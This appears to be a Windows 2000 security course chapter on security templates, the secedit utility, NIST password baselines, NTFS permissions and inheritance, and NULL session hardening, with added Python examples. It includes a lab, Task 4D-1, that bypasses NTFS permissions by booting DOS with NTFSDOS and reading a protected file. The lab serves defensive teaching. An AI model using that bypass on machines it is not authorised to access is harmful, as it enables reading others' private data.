Each template itself is a set of pre-configured options that are to be used for a given scenario. Microsoft has included a full set of templates designed to cover most of the standard scenarios that can come up. You can use the templates as-is, or modify them to suit your needs. In addition to modifying a template, you can also create new templates from scratch, so that they are fully customized for your situation.


Predefined Security Templates

Some of the common security templates that are built into the system are:

• BASICDC.INF—This template configures default Domain Controller security settings.

• BASICSV.INF—This template configures default server security settings.

• BASICWK.INF—This template configures default workstation security settings.

• COMPATWS.INF—This template configures compatible workstation or server security settings.

• SECUREWS.INF—This template configures secure workstation security settings.

• HISECDC.INF—This template configures highly secure Domain Controller security settings.

• HISECWS.INF—This template configures highly secure workstation security settings.

• SETUP SECURITY.INF—This template configures out-of-the-box default security settings.

As you can see, there are several general security levels in the templates: basic,compatible, secure, and highly secure. The following defines the general purposeand function of each of the security levels.

• The basic templates (BASIC*.INF) allow for an administrator to reverse an earlier implementation of a security configuration. The basic templates are not designed as a complete reversal of security configurations on a system, however. These templates configure Windows 2000 security settings that are not related to user rights.

• The compatible templates (COMPAT*.INF) are often run only in mixed environments, where Windows NT 4.0 machines are present. These templates configure the system so that local Power Users have security settings that are compatible with Windows NT 4.0 users.

• The secure templates (SECURE*.INF) configure security settings for the entire system, but not on files, folders, and Registry keys. Those areas are not addressed in these templates due to the default security that is in place for those objects.

• The highly secure templates (HISEC*.INF) are used to secure network communications on Windows 2000 computers. These templates allow for the highest level of protection on traffic sent to and from Windows 2000 machines. As such, these templates require that a computer configured to use a HISEC template can communicate only with other Windows 2000 computers.

Another type of preconfigured template is the Dedicated Domain Controller (DEDICADC.INF). This template is used to secure a machine running as a Domain Controller, as the name implies. The reason you might want to implement this template is that, by default, the security on a DC is designed to allow for legacy applications, so it is not as secure as it could be. If your DC is not required to run any of these programs, it is suggested that the Dedicated DC template be implemented.

Common Security Templates

security level: The combination of a hierarchical classification and a set of non-hierarchical categories that represents the sensitivity of information.


Another predefined template is one that is very important in the world today, but is not included with the other preconfigured templates—the HISECWEB.INF template. This template is designed to configure an IIS 5.0 machine running the HTTP service. Although it is not in the list of default templates, this template can be found and downloaded for free, directly from Microsoft, at http://support.microsoft.com/default.aspx?scid=kb;en-us;Q316347&, which is the URL for the Microsoft article “IIS 5: HiSecWeb Potential Risks and the IIS Lockdown Tool (Q316347).” The implementation of the HISECWEB.INF template is a requirement for any IIS 5.0 Web server that you need to have locked down.

TASK 4C-4
Analyzing Default Password Settings of Security Templates

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open an empty MMC.

2. Choose Console→Add/Remove Snap-ins.

3. Add the Security Templates Snap-In.

4. Expand and review the password policies for Basicsv, Hisecdc, and Securedc. Observe the password definitions of each template.

5. Leave the MMC open for the next task.

Custom Security Templates

As you can see from this short example, the templates provide a range of configured settings. In this case, the passwords are managed differently based on situation. In the event that a security template does not quite fit your needs, you can modify the settings. If your needs are such that you would need to modify a great deal of the template, it might be easier to simply create a new template altogether.

TASK 4C-5
Creating a Custom Security Template

Setup: You are logged on to Windows 2000 as the renamed Administrator account. The MMC is open, and the Security Templates snap-in has been added.

1. If necessary, expand the Security Templates to reveal all of the templates.

2. Right-click the directory location of the templates (such as C:\WINNT\Security\Templates), and choose New Template.


3. Name your template Custom Password Config.

4. For the Description, enter Template specifying highly secure passwords.

5. Click OK to create a blank template.

6. Configure your template to use the following settings:

a. Enforce Password History: 24 Passwords

b. Maximum Password Age: 20 days (accept the suggested value for Minimum Password Age)

c. Minimum Password Age: 5 days

d. Minimum Password Length: 14 characters

e. Account Lockout Duration: 0 minutes (accept the suggested settings)

f. Account Lockout Threshold: 3 invalid logon attempts

g. Reset Account Lockout Counter After: 120 minutes

7. Right-click the new template, and choose Save.

8. Leave the MMC open for the next task.

Security Configuration and Analysis Snap-In

Once you have created a policy, or made some changes to a predefined template, you will likely want to apply this template to the network. As mentioned earlier, templates can be applied (or imported) to GPOs. Importing a template to a GPO is a straightforward procedure and uses a tool called the Security Configuration and Analysis Snap-In.

Another of the advances in security management provided by Windows 2000 is the Security Configuration and Analysis Snap-In of the MMC. With this tool, you can implement templates and configure the security of your system. In addition to implementation, this tool allows for a complete security analysis of the operating system.

This tool takes the security settings of a template and compares the settings to the current configuration of the operating system. During this analysis, it will differentiate between those items that are in compliance and those items that are not in compliance. Items that are in compliance with the settings are highlighted with a green check mark, and items that are not in compliance are highlighted with a red X.


TASK 4C-6
Investigating the Security Configuration and Analysis Snap-In

Setup: You are logged on to Windows 2000 as the renamed Administrator account. The MMC is open, and the Security Templates snap-in has been added.

1. Add the Security Configuration and Analysis Snap-In to the MMC.

2. Right-click the Security Configuration and Analysis Snap-In and choose Open Database.

3. For the Filename, enter Password_Check.sdb, and click Open. Because there is no New option, this step creates the new file.

4. From the template list, select your Custom Password Config template, and click Open.

5. Right-click the Security Configuration and Analysis Snap-In and choose Analyze Computer Now. Accept the default path for error log messages, and click OK.

6. Once the analysis is finished, expand the Security Configuration and Analysis Snap-In, and examine whether or not your system is up to policy in regards to passwords.

7. Leave the MMC and snap-in open for the next task.

Template Implementation

Once you have a configuration you are ready to implement, you can do so by using the Security Configuration and Analysis tool as well. Be aware that making changes such as a template implementation can take a bit of time. However, the process of template implementation is quite straightforward.

There are two general timers associated with policy implementation. By default:

• Group policies that have been implemented for computers will get refreshedevery 90 minutes.

• Group policies that have been implemented for domain controllers will getrefreshed every five minutes.


TASK 4C-7
Implementing the Template

Setup: You are logged on to Windows 2000 as the renamed Administrator account. The MMC is open, and the Security Templates snap-in has been added, as well as the Security Configuration and Analysis snap-in.

1. Right-click the Security Configuration and Analysis Snap-In, and choose Configure Computer Now.

2. Keep the default location for error logs, and click OK. It will take several minutes to apply the template. There will be no message on-screen once it has been implemented; you will be at the MMC.

3. Run the analysis again to confirm the configuration has taken place.

4. Close the MMC without saving changes.

The secedit.exe Utility

Although the graphical tools are excellent methods of implementation and analysis, there are some command-line functions that can also be used to increase the security of the local machine and the network. Specifically discussed in this section is the tool secedit.exe.

Secedit.exe is a command-line tool that can be used to create and apply security templates and can analyze system security configurations. This can be a useful alternative to the GUI tools for checking multiple computers or for scheduling analysis sessions. You could use secedit.exe to analyze all your servers every Friday night, for example.

TASK 4C-8
Analyzing the Current Security Settings of the Local System

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Open a command prompt and enter secedit /export /CFG C:\secfile.txt to run the secedit.exe tool, indicating that the output should be placed in the secfile.txt file.

2. Allow the command to complete running.

3. Open the Secfile.txt document with Notepad.

Make sure that you include a space before each forward slash (/).


4. Observe the current security settings, including the Password and Auditing Settings.

5. Close Notepad and the command prompt.

Analyzing and Implementing the Gold Standard

In order to enforce a strong password culture in your organization, you have to turn on appropriate variables in more than one policy setting—that is, you might have to tinker with all of the policies under Security Settings, Account Policies, Password Policy. In fact, to tighten up the machine, you have to implement changes to many other policies. You can do this manually, or you can configure security policies to certain standards recommended by people or organizations who have studied these options well, such as the Gold Standard from NIST.

The six password policies, along with the Windows defaults and the Gold Standard recommendations, are:

• Enforce Password History—This policy determines how many unique new passwords a user must go through before an old one can be reused. The Windows default is 0; the Gold Standard recommendation is 24.

• Maximum Password Age—This policy determines how long a user can use the same password before being forced to change it. The Windows default is 42 days; the Gold Standard recommendation is 90 days.

• Minimum Password Age—This policy determines how long a user must use a password before being able to change it. This option is there to prevent users from cycling through a list of passwords in quick succession so that they can go back to their favorite password. The Windows default is 0 days; the Gold Standard recommendation is 1 day.

• Minimum Password Length—This policy determines how many characters there should be in a password. The Windows default is 0; the Gold Standard recommendation is 8.

• Passwords Must Meet Complexity Requirements—This policy determines what combination of characters should be used in a password. The Windows default is Disabled; in the Gold Standard, it is Enabled.

• Store Password Using Reversible Encryption For All Users In The Domain—This policy takes a bit of explaining. Even though it is a high-sounding policy, in essence, if you enable this option, passwords will be stored in a form that is, in effect, plaintext. Seems a bit silly in this day and age to do something like that, doesn’t it? So why have this option at all? Well, there are certain applications that use protocols that require knowledge of a user’s password in order to carry out specific authentication functions, such as when using CHAP authentication through RADIUS—in such cases, the system needs the plaintext password to generate a digest. The default is Disabled; the Gold Standard is also to leave it Disabled. In fact, it is recommended to NEVER enable this option unless absolutely required and you know what you are doing, and are aware of the consequences.
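The comparison that the Security Configuration and Analysis snap-in performs (template value against current value, green check or red X) can also be scripted over the INF output of secedit /export from Task 4C-8. The following Python is an added example, not Microsoft's tool and not part of the course: both INF texts are constructed, but they use the real [System Access] key names secedit writes, with the template holding the six Gold Standard values listed above and the "current" export holding the Windows defaults.

```python
"""Compare a security template against a secedit export, reporting per
setting whether the computer complies, as the snap-in's check/X marks do.

Constructed example for this lesson, not Microsoft code. Both INF texts
below are made up; the [System Access] key names are the ones secedit
/export writes. The template carries the Gold Standard password values,
the export carries the Windows defaults.
"""

GOLD_TEMPLATE = """\
[Unicode]
Unicode=yes
[System Access]
PasswordHistorySize = 24
MaximumPasswordAge = 90
MinimumPasswordAge = 1
MinimumPasswordLength = 8
PasswordComplexity = 1
ClearTextPassword = 0
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Constructed stand-in for the C:\secfile.txt produced in Task 4C-8.
CURRENT_EXPORT = """\
[Unicode]
Unicode=yes
[System Access]
PasswordHistorySize = 0
MaximumPasswordAge = 42
MinimumPasswordAge = 0
MinimumPasswordLength = 0
PasswordComplexity = 0
ClearTextPassword = 0
LockoutBadCount = 0
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_inf(text):
    """Parse INF sections into {section: {key: value}}; quotes are stripped."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):      # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue                               # stray line; ignore it
        key, value = (part.strip() for part in line.split("=", 1))
        sections[current][key] = value.strip('"')
    return sections


def analyze(template_text, export_text, section="System Access"):
    """Return {key: (template value, current value or None, compliant)} for
    every key the template defines. Keys the template does not mention are
    left out, just as the snap-in shows no mark for them."""
    wanted = parse_inf(template_text).get(section, {})
    actual = parse_inf(export_text).get(section, {})
    report = {}
    for key, expected in wanted.items():
        got = actual.get(key)
        report[key] = (expected, got, got == expected)
    return report


def print_report(report):
    for key, (expected, got, ok) in report.items():
        mark = "OK" if ok else "X "
        print(f"{mark} {key:22} template={expected:>3} computer={got}")


if __name__ == "__main__":
    print_report(analyze(GOLD_TEMPLATE, CURRENT_EXPORT))
```

On a real machine, feed analyze() the text of the exported file; note that secedit writes it as UTF-16, so open it with that encoding before parsing.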

Comparing Windows Defaults to the Gold Standard (2 slides)


TASK 4C-9
Configuring Policies to the Gold Standard

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. From Administrative Tools, open the Local Security Policy.

2. Expand Account Policies, and select Password Policy.

3. In the right pane, verify that the Enforce Password History policy is set to Keep Password History For 24 Passwords Remembered.

4. Double-click the Maximum Password Age policy.

5. Change the value for Passwords Expire In to 90 days, and click OK.

6. Double-click the Minimum Password Age policy.

7. Change the value to Password Can Be Changed After 1 day, and click OK.

8. Double-click the Minimum Password Length policy.

9. Change the value for Password Must Be At Least to 8 characters, and click OK.

10. Observe the Passwords Must Meet Complexity Requirements policy. You have already enabled this policy, so you can skip it here.

11. Observe the Store Password Using Reversible Encryption For All Users In The Domain policy. This policy should remain disabled, so you can skip this, too.

12. Close all open windows.

Analyzing the Gold Standard

You now have set the appropriate values for the password policies to meet the NSA/NIST’s Gold Standard. Of course, this does not mean that your machine is now operating at Gold Standard levels. There are nearly a hundred such policies and many other Registry entries that can be configured with the template for the Gold Standard.

Instead of configuring each policy one at a time, such as you did in the previous task, there is a template for meeting the Gold Standard provided on the data disk for you to use. The name of the file is NIST2kws.inf.

As an administrator, you may or may not agree with the settings provided to you in a template. Some template settings may be too strict, while others may be too lax. It is up to you to decide that. The Gold Standard is only a recommendation for a secure desktop environment. It may or may not work for your organization.


If you want, you can tinker with the settings and create your own template. Once you are satisfied with a template, you can configure the computer to match these settings. In a domain environment, remember that you also have the advantage of implementing group policies for the entire domain or an OU within a domain.

TASK 4C-10
Analyzing the Gold Standard

Setup: You are logged on to Windows 2000 as the renamed Administrator account.

1. Copy the Gold Standard template file NIST2kws.inf from your data disk to your WINNT\security\templates folder.

2. Start the MMC, and add the Security Configuration And Analysis snap-in.

3. In the left pane, select Security Configuration And Analysis.

4. Read the instructions displayed in the right pane. Because we do not have an existing database, we will follow the instructions to create a new database.

5. Right-click Security Configuration And Analysis, and choose Open Database.

6. Name the new database goldpol, and click Open.

7. In the Import Template dialog box, select the NIST2kws.inf template and click Open.

8. Again, read the instructions displayed in the right pane. We do not want to configure the computer. We only want to analyze our computer’s security settings against this template.

9. Right-click Security Configuration And Analysis, and choose Analyze Computer Now.

10. Accept the location of the error log file path, and wait a few seconds for the analysis to proceed. Your computer’s security settings are being compared to the settings in the Gold Standard template.

11. When the analysis is complete, observe the security areas listed below themain scope.

12. Expand Account Policies, and select Password Policy. In the right pane, you should see three columns of information.

The first column is the policy, the second column is the setting as specified in the template (which, in this case, is NIST’s Gold Standard), and the third column shows your computer’s present setting.


13. On each policy in the first column, verify that you see a green check mark. This means that your computer’s setting for that policy matches the template it’s being compared against. In the case of the password policies, you have already taken care of each setting manually to comply with the Gold Standard; therefore, all six policies listed here have a green check mark.

14. In the left pane, select Account Lockout Policy.

15. Observe the right pane. One of the policies—Account Lockout Threshold—has a green check mark, while the other two policies show a red X, signifying that the computer’s setting is different from the template.

16. In the left pane, expand Local Policies.

17. Select Audit Policy, User Rights Assignment, and Security Options. In each case, observe the various policies in the right pane that are not consistent with the template.

18. In the left pane, select Restricted Groups.

19. Observe the right pane. Only one group—the Power Users group—has agreen check mark. When an item has neither a green check mark nor a redX, this means that this item was not included in the template to be comparedwith.

20. Double-click the Power Users group. Observe that, according to the tem-plate, this group should have no members within it, nor should thisgroup be nested within some other group. Click Cancel.

21. In the left pane, select System Services, and observe the number of incon-sistencies displayed in the right pane.

22. Double-click any inconsistent setting and any consistent setting, andcompare the two settings.

23. In the left pane, select Registry, and observe the number of inconsisten-cies displayed in the right pane.

24. Double-click any inconsistent setting and any consistent setting, andcompare the two settings.

25. In the left pane, select File System, and observe the number of inconsis-tencies displayed in the right pane.

26. Double-click any inconsistent setting and any consistent setting, andcompare the two settings.

27. Close all open windows without saving any changes.


Topic 4D
Windows 2000 Resource Security

Many resources are available on a Windows 2000 server and network, all of which need to be secured in some manner. Let's start with the file system.

File and Folder Security

While Windows NT 4.0 could work only with the FAT and NTFS file systems, Windows 2000 can also work with FAT32. Even though Windows 2000 supports FAT and FAT32, NTFS is still the recommended choice, because it is the only one of the three that offers file-level security.

The NTFS implementation in Windows 2000, technically NTFS version 5, is required if an administrator wants to use Active Directory (a domain controller's SYSVOL must be on NTFS), the advanced file security it provides, file encryption (EFS), and disk quotas. It is strongly recommended that all partitions still running FAT or FAT32 be converted to NTFS in order to effectively secure Windows 2000 resources. If you need to convert a partition to NTFS, use the command convert c: /FS:NTFS, where c: is the partition to be converted. The conversion is one-way, and if the volume is in use (the system or boot volume, for example), it is scheduled to run at the next restart.

Any new partition, whether created as NTFS or converted to it, will by default grant the Everyone group Full Control at its root. (Windows Server 2003, originally named .NET Server, changes this default.) Because, on Windows 2000, the Everyone group includes the Guest account when it is enabled and the Anonymous Logon identity, tighten these permissions before you allow any user accounts to access the system or place any data on it.

Just as a newly created partition has default security settings, so does the installed operating system. Windows 2000 adds some measures to discourage users from changing the system files of Windows itself. Explorer hides the contents of the \Winnt and \Winnt\System32 folders by default, but one click on the Show Files link reveals them, so this is a convenience feature, not a control. The mechanism that genuinely works to your advantage is Windows File Protection (WFP), whose job is to ensure that system files installed during Setup are not deleted or overwritten. Replacement is permitted only through Microsoft-signed delivery mechanisms such as service packs, hotfixes, Windows Update, and signed driver packages; if a protected file is altered or deleted by any other means, WFP silently restores the original from the %systemroot%\System32\dllcache folder. You will notice this when installing, say, a Microsoft-approved device driver.

File and Folder Permissions

The process for viewing permissions is the same in Windows 2000 as it was on Windows NT 4.0: right-click the object, choose Properties, and view the Security tab. Click Advanced on that tab for the detailed, per-entry view. The permissions themselves are different in Windows 2000 from Windows NT 4.0. Some of the special permissions available are defined in the following list:

• Traverse Folder/Execute File: The Traverse Folder permission applies only to folders and manages a user's ability to move through a folder to reach other files and folders, even when the user has no other permissions on the folders being traversed. In practice it rarely matters, because the Bypass Traverse Checking user right, granted to Everyone by default, makes Windows skip the check. The Execute File permission applies only to files and manages a user's ability to run program files.

• List Folder/Read Data: The List Folder permission applies only to folders and manages a user's ability to view file names and folder names. The Read Data permission applies only to files and manages a user's ability to read the file's contents.

• Create Folders/Append Data: The Create Folders permission applies only to folders and manages a user's ability to create folders within a folder. The Append Data permission applies only to files and manages a user's ability to add data to the end of a file without changing what is already there.

• Delete: This permission manages a user's ability to delete a file or a folder.

• Read Permissions: This permission manages a user's ability to read the permissions of a file or a folder.

• Change Permissions: This permission manages a user's ability to change the permissions of a file or a folder.

• Take Ownership: This permission manages a user's ability to take ownership of a file or folder.

• Read Attributes: This permission manages a user's ability to read the attributes of a file or folder.

• Write Attributes: This permission manages a user's ability to modify the attributes of a file or folder.

The same dialog also offers Create Files/Write Data, Read Extended Attributes, Write Extended Attributes, Delete Subfolders And Files, and Synchronize, which are not described here. A special permission on its own neither allows nor denies anything; the administrator must define, for each object, whether each entry is an Allow or a Deny. In general, it is not necessary to work with the individual special permissions when securing resources. You will most likely use the predefined groupings: Full Control, Modify, Read And Execute, List Folder Contents, Read, and Write. The specific abilities each of these confers are defined in the chart shown in Figure 4-9.

Figure 4-9: Windows 2000 NTFS folder permissions.

NTFS Folder Permissions


As you can see, when you apply the Read permission to a folder, the folder receives List Folder/Read Data, Read Attributes, Read Extended Attributes, and Read Permissions (plus the implicit Synchronize right). NTFS file permissions are similar, except that there is no List Folder Contents option, because the permissions apply to a file. One big difference from Windows NT 4.0 NTFS permissions is the ability to explicitly deny each of these permissions.

Inheritance and Propagation

When you create a new file, it inherits the permissions of its parent folder, or of the root of the volume if it is created at the top level. Therefore, if a parent folder is set for Everyone Modify, the file you create in that folder will have Everyone Modify as its permissions.

You can alter this behaviour. When you add a permission entry to a folder, you can set its Apply Onto scope to This Folder Only, which marks the entry as not inheritable: new data created in the folder will not receive it. The new objects still receive every inheritable entry present on the folder, and those are exactly the entries the folder itself inherited from its parent. Say you have a folder D:\Secure\One whose own entries are all set to This Folder Only, and you create a file D:\Secure\One\test.txt. The file's inherited permissions will, in effect, be those of the D:\Secure folder.

You can also block the inheritance of permissions altogether by clearing the Allow Inheritable Permissions From Parent To Propagate To This Object option on the Security tab of the Properties window for an object. When you clear this option, you will be presented with three choices:

• Copy: keep the permissions that this object has inherited, converted into explicit entries on the object.

• Remove: remove all permissions except for those that have been explicitly applied to this object.

• Cancel: abandon the operation and keep the permissions as they were.

The process of setting permissions is similar to that of Windows NT 4.0, with the exception that you explicitly allow or deny each permission. If you want to give a user or a group what was called No Access in Windows NT, you would give that user or group Deny on the Full Control permission in Windows 2000. Within the same level (explicit entries, then inherited ones), Deny entries are evaluated before Allow entries, so a Deny on one of the user's groups wins over an Allow granted to another of them.
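As an added example (not from the course), the following Python model encodes the rules just described: the Apply Onto choices become the inheritance flags Windows actually stores on each entry, a child's ACL is built from the parent's inheritable entries in order, and the access check walks explicit Deny, explicit Allow, then inherited entries. The tree, groups, and rights sets are constructed to match the text's D:\Secure\One\test.txt example and the Task 4D-1 file with Everyone Deny Full Control; the rights groupings mirror the Windows 2000 Read, Write, Modify, and Full Control sets. Privileges such as Take Ownership, which let an administrator get around a Deny, are deliberately not modelled.

```python
"""Model of NTFS ACE inheritance and the DACL access check.
Example code added here; not from the course.  Tree, groups and rights sets
are constructed to match the text's examples."""
from dataclasses import dataclass, field
from typing import Optional

# Inheritance flags stored on each entry.  OI: files inherit it, CI: subfolders
# inherit it, IO: it does not apply to the object holding it, NP: inherited
# copies are not themselves inheritable.  These are the "Apply onto" choices.
APPLIES_TO = {
    "This folder only": frozenset(),
    "This folder, subfolders and files": frozenset({"OI", "CI"}),
    "This folder and subfolders": frozenset({"CI"}),
    "This folder and files": frozenset({"OI"}),
    "Subfolders and files only": frozenset({"OI", "CI", "IO"}),
}
READ = frozenset({"ReadData", "ReadAttributes", "ReadExtendedAttributes",
                  "ReadPermissions", "Synchronize"})
WRITE = frozenset({"WriteData", "AppendData", "WriteAttributes",
                   "WriteExtendedAttributes", "ReadPermissions", "Synchronize"})
MODIFY = READ | WRITE | {"Execute", "Delete"}
FULL = MODIFY | {"DeleteSubfoldersAndFiles", "ChangePermissions", "TakeOwnership"}


@dataclass(frozen=True)
class Ace:
    kind: str                       # "allow" or "deny"
    trustee: str
    rights: frozenset
    flags: frozenset = frozenset()
    inherited: bool = False


def inherit(ace, child_is_folder):
    """The entry a new child receives from one parent entry, or None."""
    f = ace.flags
    if not child_is_folder:
        if "OI" not in f:
            return None
        return Ace(ace.kind, ace.trustee, ace.rights, frozenset(), True)
    if "CI" in f:
        effective = True            # applies to the subfolder itself
    elif "OI" in f:
        effective = False           # carried only for the subfolder's own files
    else:
        return None                 # "This folder only": stops here
    if "NP" in f:
        return Ace(ace.kind, ace.trustee, ace.rights, frozenset(), True) if effective else None
    flags = {x for x in f if x in ("OI", "CI")}
    if not effective:
        flags.add("IO")
    return Ace(ace.kind, ace.trustee, ace.rights, frozenset(flags), True)


@dataclass
class Node:
    path: str
    is_folder: bool
    explicit: list = field(default_factory=list)
    parent: Optional["Node"] = None

    def acl(self):
        """Canonical order: explicit deny, explicit allow, then the entries
        inherited from the parent in the parent's own canonical order."""
        own = sorted(self.explicit, key=lambda a: a.kind == "allow")
        if self.parent is None:
            return own
        inherited = [inherit(a, self.is_folder) for a in self.parent.acl()]
        return own + [a for a in inherited if a is not None]


def access_check(node, groups, requested):
    """True if every requested right is granted before an applicable Deny
    covers a right that is still outstanding."""
    remaining = set(requested)
    for ace in node.acl():
        if ace.trustee not in groups or "IO" in ace.flags:
            continue
        if ace.kind == "deny" and ace.rights & remaining:
            return False
        if ace.kind == "allow":
            remaining -= ace.rights
        if not remaining:
            return True
    return False


def trustees(node):
    return [(a.kind, a.trustee, a.inherited) for a in node.acl()]


# Constructed tree from the text: D:\Secure passes Everyone Modify down to
# everything beneath it; D:\Secure\One adds Users Read as "This folder only".
SECURE = Node(r"D:\Secure", True, [
    Ace("allow", "Administrators", FULL, APPLIES_TO["This folder, subfolders and files"]),
    Ace("allow", "Everyone", MODIFY, APPLIES_TO["This folder, subfolders and files"]),
])
ONE = Node(r"D:\Secure\One", True,
           [Ace("allow", "Users", READ, APPLIES_TO["This folder only"])], SECURE)
TEST_TXT = Node(r"D:\Secure\One\test.txt", False, [], ONE)
SUB = Node(r"D:\Secure\One\Sub", True, [], ONE)
# Task 4D-1: an explicit Everyone/Deny Full Control on a file.
SECRET = Node(r"D:\Secure\secret.txt", False, [Ace("deny", "Everyone", FULL)], SECURE)
```

Running trustees(TEST_TXT) shows only the two inherited Allow entries from D:\Secure, with no trace of the Users entry from D:\Secure\One, and access_check(SECRET, ...) fails for Administrators as well as Everyone because the explicit Deny is evaluated before the inherited Allow.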

Setting permissions is a fairly straightforward job, and one that all security professionals should be comfortable with. There is a way, however, for an attacker to get around your NTFS security if he or she can gain physical access to the computer: boot an alternative operating system, specifically MS-DOS, from removable media.

You might be thinking that DOS cannot affect files on an NTFS partition, since DOS does not even recognize NTFS. Ordinarily this is true; however, there are tools and utilities designed to access NTFS from DOS. The best known of these is NTFSDOS, from Sysinternals. The freeware version mounts NTFS volumes read-only, which is all an attacker needs to copy data out; the commercial NTFSDOS Professional edition, and Linux boot disks with NTFS support, can write as well. NTFS permissions are enforced by the Windows kernel, not by the disk format, so an offline reader simply ignores them. The only file-level defence that survives this is EFS encryption; the other countermeasures are physical: lock the case, set a BIOS password, and remove the floppy and CD-ROM drives from the boot order. The following task will allow you to access a secured NTFS file via DOS.


TASK 4D-1
Compromising NTFS Security

Setup: You are logged on to Windows 2000 as the renamed Administrator account. This task requires the NTFSDOS utility on a bootable floppy disk.

1. On your Windows 2000 boot partition, create a folder called Secure.

2. Within this folder, create a new text file called secret.txt, and add the text This is a secure file. to the document.

3. Set the security on this file so that the Everyone group has Full Control set to Deny, and acknowledge the warning message. Now, not even the administrator should be able to access this file (short of taking ownership and rewriting the permissions).

4. Test the security by trying to open secret.txt. You should not be able to access the file.

5. Restart the computer, and boot to DOS using the bootable floppy disk that holds NTFSDOS.

6. At the DOS prompt, enter ntfsdos to start the utility. The NTFS partitions are mounted, with drive letters assigned to them.

7. Navigate to the partition where you created the Secure folder, and enter cd secure to change to this folder.

8. Enter type secret.txt to display the text file on the screen.

9. Observe the contents of the so-called secret file. No permission check took place, because nothing in the DOS environment knows or cares about the file's ACL.

10. Remove the bootable floppy disk, and reboot the computer.

The NULL Session

In order for a system to provide shared resources to the network, it must communicate with the network, and some of that communication (browse-list exchanges and enumeration between systems, for example) takes place over anonymous connections from system to system. Internally, this may not present a problem, but if the machine is directly reachable from the Internet, the same mechanism lets an attacker enumerate user accounts, groups, shares, and policy details of the inside network without any credentials.

When an attacker connects in this manner (with the anonymous logon), it is called a NULL session connection. To combat this, restrict the NULL session. The setting lives under Local Policies in any security template, in the Local Security Policy, or in a Group Policy object; note that editing a template file on its own changes nothing until that template is applied to the computer:

1. Open the security template (or the Local Security Policy) in the MMC.

2. Navigate to Local Policies.

3. Navigate to Security Options.

4. Set Additional Restrictions For Anonymous Connections to No Access Without Explicit Anonymous Permissions.

This option controls the REG_DWORD value RestrictAnonymous under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. The three choices map to 0 (rely on default permissions), 1 (do not allow enumeration of SAM accounts and shares), and 2 (no access without explicit anonymous permissions). The value 2 is the strongest, but it also breaks browsing, down-level Windows 9x and NT 4.0 clients, and some trust operations that depend on anonymous access, so test it on a member server before rolling it out to domain controllers.
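The analysis in the Security Configuration And Analysis task above and the anonymous-connection setting just described both come down to the same artifact: a security template is an INI-style .inf file, and the MMC compares its sections against the machine's current settings, which secedit /export writes out in the same layout. The following script, added here as an example and not part of the course, performs that comparison offline and reports the same three states the snap-in shows (match, mismatch, not in template). Both .inf texts are constructed samples; the [Registry Values] line for RestrictAnonymous is the template form of Additional Restrictions For Anonymous Connections, where 4 means REG_DWORD and 2 means No Access Without Explicit Anonymous Permissions.

```python
"""Offline equivalent of Security Configuration And Analysis: compare a
security template (.inf) with an exported current configuration.
Example code added to this page, not from the course.  Both .inf texts are
constructed samples in the layout secedit /export and the template editor use."""

MATCH, MISMATCH, NOT_IN_TEMPLATE = "match", "mismatch", "not-in-template"
# In the MMC: green check mark, red X, and no icon, respectively.


def parse_inf(text):
    """Parse the INI-style file into {section: {key: value}}.  [Registry Keys]
    and [File Security] lines carry no '=' ("path",mode,"SDDL"); for those
    the path becomes the key."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None:
            continue
        sep = "=" if "=" in line else ","
        key, _, value = line.partition(sep)
        sections[current][key.strip().strip('"')] = value.strip()
    return sections


def normalize(section, value):
    """Privilege assignments are unordered SID lists; everything else is a
    case-insensitive string."""
    if section == "Privilege Rights":
        return frozenset(p.strip().lower() for p in value.split(",") if p.strip())
    return value.strip().strip('"').lower()


def analyze(template, current,
            sections=("System Access", "Registry Values", "Privilege Rights")):
    """Return {(section, key): (status, template_value, current_value)}."""
    results = {}
    for section in sections:
        tmpl, cur = template.get(section, {}), current.get(section, {})
        for key in sorted(set(tmpl) | set(cur)):
            if key not in tmpl:
                status = NOT_IN_TEMPLATE
            elif key not in cur:
                status = MISMATCH        # template sets it, machine has no value
            elif normalize(section, tmpl[key]) == normalize(section, cur[key]):
                status = MATCH
            else:
                status = MISMATCH
            results[(section, key)] = (status, tmpl.get(key), cur.get(key))
    return results


def findings(results):
    """The red-X rows, as printable lines."""
    return [f"{s}\\{k}: template={t!r} computer={c!r}"
            for (s, k), (st, t, c) in sorted(results.items()) if st == MISMATCH]


def count_by_status(results):
    counts = {MATCH: 0, MISMATCH: 0, NOT_IN_TEMPLATE: 0}
    for status, _, _ in results.values():
        counts[status] += 1
    return counts


# Constructed Gold-Standard-style template (a subset of a real NIST .inf).
# RestrictAnonymous=4,2: REG_DWORD 2, "No access without explicit permissions".
TEMPLATE = r"""
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 90
MinimumPasswordLength = 8
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 5
ResetLockoutCount = 30
LockoutDuration = 30
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymous=4,2
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\AutoDisconnect=4,15
[Privilege Rights]
SeRemoteShutdownPrivilege = *S-1-5-32-544
SeTakeOwnershipPrivilege = *S-1-5-32-544
"""

# Constructed export of the machine's current settings (secedit /export /cfg).
CURRENT = r"""
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 90
MinimumPasswordLength = 8
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 5
ResetLockoutCount = 15
LockoutDuration = 15
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\RestrictAnonymous=4,0
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\AutoDisconnect=4,15
[Privilege Rights]
SeRemoteShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-549
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
"""

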